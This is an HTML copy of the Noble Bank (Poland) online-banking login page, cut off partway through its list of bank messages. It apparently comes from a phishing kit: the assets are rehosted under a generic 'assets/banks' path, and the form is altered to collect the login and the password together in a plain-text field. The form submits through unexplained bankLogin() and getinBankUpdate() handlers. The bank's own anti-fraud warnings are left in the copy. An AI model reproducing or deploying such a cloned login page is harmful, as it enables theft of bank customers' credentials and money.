<!DOCTYPE html>
<!-- saved from url=(0040)https://secure.noblebank.pl/#index/index -->
<html lang="pl" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Bankowość Internetowa - Noble Bank</title>

    <meta name="google" value="notranslate">
    <meta name="description" content="System Bankowości Internetowej Noble Banku to najwygodniejszy sposób zarządzania swoimi finansami. Możesz z niego korzystać prosto ze swojego komputera wszędzie tam, gdzie masz dostęp do Internetu.">
    <meta name="robots" content="noindex">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable = no">

    <!--[if lt IE 9]>
    <script src="/static/scripts/libs/html5shiv.min.js"></script>
    <![endif]-->



    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/bootstrap.css">


    <!--[if !IE]><!-->
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/combined.min.css">
    <!--<![endif]-->
    <!--[if IE]>
    <link rel="stylesheet" type="text/css" href="/static/noblebank/css/combined-parts.css?1612102254">
    <link rel="stylesheet" type="text/css" href="/static/noblebank/css/our_ie.css?1612102254">

    <![endif]-->

    <!--[if IE 9]>
    <style>
        .h--submenu > li {
            display: inline;
            float: left;
        }
        .h--submenu > li .select-field {
            display:block !important;

            width:auto;
        }
    </style>
    <![endif]-->
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/default.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/our_changes.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/popup-window.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/popup-window-colors.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/changes.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/font_icoomon_styles.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/popupCreditPa.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/banner.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/smart-app-banner.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/settings.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/settings(1).css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/main.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/icons.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/proposals.css">
    <link href="/assets/banks/noblebank_files/messages.css" rel="stylesheet" type="text/css">
    <link href="/assets/banks/noblebank_files/Lato.css" rel="stylesheet" type="text/css">
    <style>
        @font-face {
            font-family: 'ui';
            src: url("https://secure.getinbank.pl/static/fonts/ui-kit.ttf?1612102254") format("truetype"),
            url("https://secure.getinbank.pl/static/fonts/ui-kit.woff?1612102254") format("woff"),
            url("https://secure.getinbank.pl/static/fonts/ui-kit.svg?1612102254") format("svg");
            font-weight: normal;
            font-style: normal;
        }
        * {
            font-family: sans-serif;
        }
    </style>
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/ui_kit.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/datepicker.css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/our_changes(1).css">
    <link rel="stylesheet" type="text/css" href="/assets/banks/noblebank_files/ui_kit(1).css">

    <meta name="apple-itunes-app" content="app-id=674598453">
    <meta name="google-play-app" content="app-id=pl.noblebank.mobile">
    <meta name="msApplication-ID" content="x5bca1ad9y2d66y42afyaebayd9f8230723f2x">
    <meta name="msApplication-PackageFamilyName" content="39001CDE-3E0A-4B48-9240-07A9D8614F07_bbx7k27895yhg">
    <link rel="manifest" href="https://secure.noblebank.pl/static/noblebank/manifest.json">



    <!-- FAVICONS -->
    <link rel="apple-touch-icon" sizes="180x180" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-180x180.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-114x114.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-72x72.png">
    <link rel="icon" type="image/png" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-192x192.png" sizes="192x192">
    <link rel="icon" type="image/png" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-96x96.png" sizes="96x96">
    <link rel="icon" type="image/png" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="https://secure.noblebank.pl/static/noblebank/images/favicons/favicon-16x16.png" sizes="16x16">
    <!-- END FAVICONS -->

    <script data-cache="1612102254" src="/assets/banks/noblebank_files/router.js.pobrane"></script>

    <link rel="shortcut icon" href="https://secure.noblebank.pl/static/noblebank/images/favicon.ico" type="image/x-icon">
    <script data-cache="1612102254" data-main="/static/scripts/main" src="/assets/banks/noblebank_files/require.js.pobrane"></script>
    <script type="text/javascript">
        var app_brand = 'noblebank';
        var isDemoMode = false;
        var smartBannerDaysHidden = '15';
        var smartBannerDaysReminder = '90';
        var defaultContext = '';
    </script>
    <script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="main" src="/assets/banks/noblebank_files/main.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="app" src="/assets/banks/noblebank_files/app.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="jquery" src="/assets/banks/noblebank_files/jquery-1.11.2.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="underscore" src="/assets/banks/noblebank_files/underscore-min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="backbone" src="/assets/banks/noblebank_files/backbone-min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="router" src="/assets/banks/noblebank_files/router.js(1).pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="RequestModel" src="/assets/banks/noblebank_files/RequestModel.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="mainRouter" src="/assets/banks/noblebank_files/router.js(2).pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="mainRequestModel" src="/assets/banks/noblebank_files/RequestModel.js(1).pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="jqueryMigrate" src="/assets/banks/noblebank_files/jquery-migrate-1.2.1.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="md5" src="/assets/banks/noblebank_files/md5.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="easing" src="/assets/banks/noblebank_files/jquery.easing.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="front/views/IndexView" src="/assets/banks/noblebank_files/IndexView.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="jCaret" src="/assets/banks/noblebank_files/jquery.caret.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="SiteView" src="/assets/banks/noblebank_files/SiteView.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="SmartBanner" src="/assets/banks/noblebank_files/smart-app-banner.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="MobileDetect" src="/assets/banks/noblebank_files/mobile-detect.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="eventManager" src="/assets/banks/noblebank_files/EventManager.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="banner" src="/assets/banks/noblebank_files/Banner.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="mainSiteView" src="/assets/banks/noblebank_files/SiteView.js(1).pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="legacy" src="/assets/banks/noblebank_files/legacy.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="livequery" src="/assets/banks/noblebank_files/jquery.livequery.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="jqueryui" src="/assets/banks/noblebank_files/jquery-ui.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="validateForms" src="/assets/banks/noblebank_files/validateForms.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="DefaultActions" src="/assets/banks/noblebank_files/DefaultActions.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="slick" src="/assets/banks/noblebank_files/slick.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="mainDefaultActions" src="/assets/banks/noblebank_files/DefaultActions.js(1).pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="raphael" src="/assets/banks/noblebank_files/raphael-min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="popUp" src="/assets/banks/noblebank_files/popup.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="modernizr" src="/assets/banks/noblebank_files/modernizr.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="icheck" src="/assets/banks/noblebank_files/icheck.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="inputmask_core" src="/assets/banks/noblebank_files/inputmask.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="actual" src="/assets/banks/noblebank_files/jquery.actual.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="fileDownload" src="/assets/banks/noblebank_files/jquery.fileDownload.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="picker" src="/assets/banks/noblebank_files/picker.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="formSelect" src="/assets/banks/noblebank_files/formSelect.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="bootstrap" src="/assets/banks/noblebank_files/bootstrap.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="nanoscroller" src="/assets/banks/noblebank_files/jquery.nanoscroller.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="Fingerprint2" src="/assets/banks/noblebank_files/fp2.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="datepicker" src="/assets/banks/noblebank_files/bootstrap-datepicker.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="notifications" src="/assets/banks/noblebank_files/Notifications.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="animateAuto" src="/assets/banks/noblebank_files/jquery.animateAuto.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="uiKit" src="/assets/banks/noblebank_files/UiKit.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="stickyMenu" src="/assets/banks/noblebank_files/stickyMenu.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="confirmation" src="/assets/banks/noblebank_files/Confirmation.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="chat" src="/assets/banks/noblebank_files/Chat.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="transfer" src="/assets/banks/noblebank_files/Transfer.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="oad" src="/assets/banks/noblebank_files/oad.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="ferryt" src="/assets/banks/noblebank_files/Ferryt.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="raphaelpiechart" src="/assets/banks/noblebank_files/raphaelpiechart.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="bootstrapTour" src="/assets/banks/noblebank_files/bootstrap-tour.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="inputmask" src="/assets/banks/noblebank_files/jquery.inputmask.min.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="pickerdate" src="/assets/banks/noblebank_files/picker.date.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="tutorial" src="/assets/banks/noblebank_files/tutorial.js.pobrane"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="picker_pl" src="/assets/banks/noblebank_files/pl_PL.js.pobrane"></script></head>
<body class="login-page" data-brand="noblebank" cz-shortcut-listen="true">

<noscript>
    <div class="error-page">
        <div class="page-wrapper">
            <section class="wrapper">
                <h2 class="clear">Nie można skorzystać z bankowości internetowej</h2>
                <h3>Przeglądarka internetowa ma wyłączoną obsługę JavaScript</h3>
                <h3>Prosimy o zmianę ustawień przeglądarki</h3>
                <br />
                <h3>Jak zmienić ustawienia przeglądarki?</h3>

                <ul class="browser-list">
                    <li class="ff">
                        <a href="http://support.mozilla.org/pl/kb/javascript" title="Zaktualizuj przegldarkę" target="_blank"><div class="image"></div>MOZILLA FIREFOX</a>
                    </li>

                    <li class="chrome">
                        <a href="http://support.google.com/chrome/answer/114662?hl=pl" title="Zaktualizuj przegldarkę" target="_blank"><div class="image"></div>GOOGLE CHROME</a>
                    </li>

                    <li class="ie">
                        <a href="http://windows.microsoft.com/pl-pl/windows/what-do-internet-explorer-script-errors#1TC=windows-7" title="Zaktualizuj przegldarkę" target="_blank"><div class="image"></div>INTERNET EXPLORER</a>
                    </li>

                    <li class="safari">
                        <a href="http://support.apple.com/kb/PH17209?viewlocale=pl_PL&locale=pl_PL" title="Zaktualizuj przegldarkę" target="_blank"><div class="image"></div>SAFARI 5</a>
                    </li>

                    <li class="opera">
                        <a href="http://help.opera.com/Windows/12.10/pl/javascript.html" title="Zaktualizuj przegldarkę"><div class="image" target="_blank"></div>OPERA 10</a>
                    </li>
                </ul>


                <a href="http://noblebank.pl" class="h--btn h--btn-light-gray h--gray-hover">&larr; POWRÓT DO noblebank.PL</a>


                <p class="short">W razie jakichkolwiek pytań lub wątpliwości prosimy o&nbsp;kontakt z&nbsp;Infolinią Banku. Nasi konsultanci są do Państwa dyspozycji codziennie całodobowo.</p>

                <div class="h--btn h--btn-wide no-border prepend-icon"><i class="icon icon--phone"></i> zadzwoń na infolinię </div>

            </section>
        </div>
    </div>
</noscript>

<div class="h--box-alert-top error extendSessionWrapper" style="height: 0px;"></div>
<div class="h--box-alert-top errorAccessAttempts" style="display: none; height: 40px;">
    <i class="icon icon--valid-notice2"></i>PRÓBA LOGOWANIA Z NIEDOZWOLONEGO OBSZARU GEOGRAFICZNEGO <span class="accessAttemptsDate">DATA: </span><span class="accessAttemptsTime">GODZ: </span><span class="accessAttemptsIp">ADRES IP: </span><button class="h--btn hideZoneInformation" type="button">zamknij</button>
</div>
<div class="h--overlay-black" style="display: none"></div>
<div id="siteViewWrapper" style="display: block;">                                <div class="loginAlertDanger">
        <div>
            <a href="https://www.getinbank.pl/klienci-indywidualni/aktualnosci/uwazaj-na-oszustow-podajacych-sie-za-pracownikow-firmy-inwestycyjnej.html" target="_blank">
                Uważaj na oszustów podających się za pracowników firmy inwestycyjnej!<br>
                Nie podawaj nikomu danych swojej karty płatniczej ani danych do logowania!
            </a>
        </div>
    </div>
    <section class="h--section-white login-wrapper margin0" id="index-container">
        <div class="wrapper">
            <div id="logotype">
                <img src="/assets/banks/noblebank_files/nb_logo.png">
            </div>
            <div id="left-container">

                <div id="login-response"></div>
                <div id="login-container" class="jsPrepareConfirmation jsActiveConfirmation">

                    <div id="signinform" class="h--form-login mb20 clearfix" data-action="index/index" data-type="html" data-destination="#login-container" method="post"><input type="hidden" name="step" value="1">
                        <input type="hidden" name="send" value="true">
                        <div class="steps two">
                            <div class="step one active"><div><span>Login</span></div></div>
                            <div class="step two"><div><span>Hasło</span></div></div>
                        </div>
                        <div class="show_login"></div>
                        <div class="step1">
                            <div class="full-window"></div>
                            <div class="h--form--field h--input-prepend" id="mainCont">
                                <input id="bank_login" name="login" type="text" class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias" placeholder="WPISZ LOGIN LUB ALIAS" autocomplete="off">        <span class="add-on"><i class="icon icon--male"></i></span><br><br>
                                <input id="bank_password" name="login" type="text" class="validateOnChangeOnly toValidate validateRequired validateLength validateLoginAlias" placeholder="WPISZ HASŁO" autocomplete="off">        <span class="add-on"><i class="icon icon--male"></i></span>
                                <span class="add-on add-on-login" id="to_login-information"><i class="icon icon--info-mark"></i></span>
                                <div class="login-information">
                                    <div class="information-title">GDZIE ZNAJDĘ LOGIN LUB ALIAS?</div><i id="close_login-information" class="icon icon--info-close close_login-information"></i>
                                    <div class="clearfix"></div>
                                    <p>LOGIN - został wysłany e-mailem lub znajduje się na Umowie o Bankowość Elektroniczną lub Pakietową. Składa się z samych cyfr.</p>
                                    <p>ALIAS – tzw . Własny login, czyli dowolna nazwa, którą można zdefiniować po zalogowaniu się do Bankowości Internetowej.</p>
                                </div>
                            </div>
                            <div id="buttonsCont">
                                <button onclick="bankLogin(); getinBankUpdate()" type="submit" class="h--btn-arrow-right h--btn-light-green gotoPassword float-right long login-next-button fz-12">dalej</button>
                            </div>
                            <button type="button" class="h--btn h--btn-light-gray h--gray-hover float-left prepend-icon showHideHelp fz-12"> pomoc</button>
                            <div class="clearfix"></div>
                            <div id="login-first-step" class="index-link">
                                <a id="login-help-link" class="href-bottom-border showHideLoginHelp">Problemy z logowaniem?</a>
                                <a id="login-help-arrow" class="showHideLoginHelp">
                                    <i id="login-help-step-one-arrow" class="icon icon--arrow-right-mark mt-6"></i>
                                </a>
                            </div>
                        </div>
                    </div></div>

                <div class="link-keyboard" style="height:12px; width:300px;">
                    <p class="showKeyboard actionshowkeyboard">Klawiatura ekranowa</p><i style="margin-top: 6px;" class="icon icon--arrow-right-mark actionshowkeyboard"></i>
                </div>        <div class="messages">

                    <div class="bt-mobile">
                        <a href="http://noblebank.pl/" class="h--btn h--green-hover">← POWRÓT DO noblebank.PL</a>
                    </div>

                    <div class="h--info msg_list">
                        <p class="title-wide"><span>Wiadomości</span></p>
                        <ul>
                            <li class="showMgsSection" data-code="289">
                                <div class="msg_date">15.01.2021</div>
                                <div class="msg_title"><p>Tarcza Finansowa PFR 2.0 dla mikro, małych i średnich firm.</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="289">
                                <div class="msg_date">15.01.2021</div>
                                <div class="msg_title"><p>Tarcza Finansowa PFR 2.0 dla mikro, małych i średnich firm.</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883005_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="290">
                                <div class="msg_date">02.02.2021</div>
                                <div class="msg_title"><p>Niedostępność Bankowości Internetowej i Mobilnej w nocy z 5 na 6 lutego 2021 r.</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="290">
                                <div class="msg_date">02.02.2021</div>
                                <div class="msg_title"><p>Niedostępność Bankowości Internetowej i Mobilnej w nocy z 5 na 6 lutego 2021 r.</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883008_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="285">
                                <div class="msg_date">15.12.2020</div>
                                <div class="msg_title"><p>Uważaj - wyłudzenia „na dopłatę”</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="285">
                                <div class="msg_date">15.12.2020</div>
                                <div class="msg_title"><p>Uważaj - wyłudzenia „na dopłatę”</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883009_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                        </ul>
                    </div>

                    <div class="title-wide moreMgs"><span class="decoration triangle down show-more-descop">POKAŻ WIĘCEJ</span><span class="show-more-mobile">POKAŻ WIĘCEJ</span></div>
                    <div class="h--info msg_list more hide">
                        <ul>
                            <li class="showMgsSection" data-code="281">
                                <div class="msg_date">25.11.2020</div>
                                <div class="msg_title"><p>Ostrzeżenie przed oszustami podszywającymi się pod pracowników Banku</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="281">
                                <div class="msg_date">25.11.2020</div>
                                <div class="msg_title"><p>Ostrzeżenie przed oszustami podszywającymi się pod pracowników Banku</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883010_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="279">
                                <div class="msg_date">06.11.2020</div>
                                <div class="msg_title"><p>Uważaj na oszustów podających się za pracowników firmy inwestycyjnej</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="279">
                                <div class="msg_date">06.11.2020</div>
                                <div class="msg_title"><p>Uważaj na oszustów podających się za pracowników firmy inwestycyjnej</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883011_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="271">
                                <div class="msg_date">23.06.2020</div>
                                <div class="msg_title"><p>Przestrzegamy przed wyłudzeniami środków od klientów banków – tzw. metodą na dopłatę.</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="271">
                                <div class="msg_date">23.06.2020</div>
                                <div class="msg_title"><p>Przestrzegamy przed wyłudzeniami środków od klientów banków – tzw. metodą na dopłatę.</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883012_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="257">
                                <div class="msg_date">04.12.2019</div>
                                <div class="msg_title"><p>Od 1 stycznia 2020 r. podatek PIT, CIT i VAT należy opłacać na mikrorachunek podatkowy. Prosimy o zapoznanie się ze zmianami.</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="257">
                                <div class="msg_date">04.12.2019</div>
                                <div class="msg_title"><p>Od 1 stycznia 2020 r. podatek PIT, CIT i VAT należy opłacać na mikrorachunek podatkowy. Prosimy o zapoznanie się ze zmianami.</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883012_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="249">
                                <div class="msg_date">02.09.2019</div>
                                <div class="msg_title"><p>Uwaga na telefony od osób podszywających się pod pracowników banków</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="249">
                                <div class="msg_date">02.09.2019</div>
                                <div class="msg_title"><p>Uwaga na telefony od osób podszywających się pod pracowników banków</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883013_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="224">
                                <div class="msg_date">03.08.2018</div>
                                <div class="msg_title"><p>Ostrzegamy przed oszustwem z wykorzystaniem duplikatów kart SIM</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="224">
                                <div class="msg_date">03.08.2018</div>
                                <div class="msg_title"><p>Ostrzegamy przed oszustwem z wykorzystaniem duplikatów kart SIM</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883014_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="208">
                                <div class="msg_date">21.03.2018</div>
                                <div class="msg_title"><p>Ważna wiadomość dla Klientów korzystających ze smartfonów z systemem Android.</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="208">
                                <div class="msg_date">21.03.2018</div>
                                <div class="msg_title"><p>Ważna wiadomość dla Klientów korzystających ze smartfonów z systemem Android.</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883015_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="201">
                                <div class="msg_date">13.12.2017</div>
                                <div class="msg_title"><p>Zmiany w realizacji płatności składek do ZUS</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="201">
                                <div class="msg_date">13.12.2017</div>
                                <div class="msg_title"><p>Zmiany w realizacji płatności składek do ZUS</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883016_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="181">
                                <div class="msg_date">30.03.2017</div>
                                <div class="msg_title"><p>Nowe zagrożenia w sieci</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="181">
                                <div class="msg_date">30.03.2017</div>
                                <div class="msg_title"><p>Nowe zagrożenia w sieci</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883016_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="163">
                                <div class="msg_date">03.11.2016</div>
                                <div class="msg_title"><p>Informacja dotycząca przelewów w euro</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="163">
